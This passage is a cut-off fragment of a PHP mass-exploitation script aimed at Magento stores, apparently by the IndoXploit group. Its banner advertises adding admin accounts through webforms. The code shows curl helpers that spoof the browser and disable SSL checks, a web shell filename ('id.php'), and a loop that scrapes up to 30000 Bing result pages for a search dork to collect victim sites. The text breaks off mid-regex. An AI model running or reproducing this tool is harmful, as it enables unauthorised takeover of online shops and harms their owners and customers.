Magento Xploit with Bing Grabber <-----\n"; print "All in One Package: [webforms,add admin] Xploit\n"; print "Coded by: l0c4lh34rtz ( Mr. Error 404 )\n"; print "Greetz: IndoXploit - Sanjungan Jiwa\n"; print "[ ========================================== ]\n\n"; } public function ngcurl($url,$post=null) { $ch = curl_init($url); if($post != null) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); return curl_exec($ch); curl_close($ch); } public function xploit($url, $post) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"); curl_setopt($ch, CURLOPT_TIMEOUT, 60); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_POST, 1); $headers = array(); $headers[] = 'Accept-Encoding: gzip, deflate'; $headers[] = 'Content-Type: application/x-www-form-urlencoded'; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_HEADER, 1); return curl_exec($ch); curl_close($ch); } public function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } } $idx = new indoxploit_mage_exploit(); $shell = "id.php"; $dork = str_replace("'", "", $argv[1]); $dork = urlencode($dork); if(isset($dork)) { $idx->cover(); $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = $idx->ngcurl("http://www.bing.com/search?q=".$dork."&first=".$npage."", null); if($x) { preg_match_all('#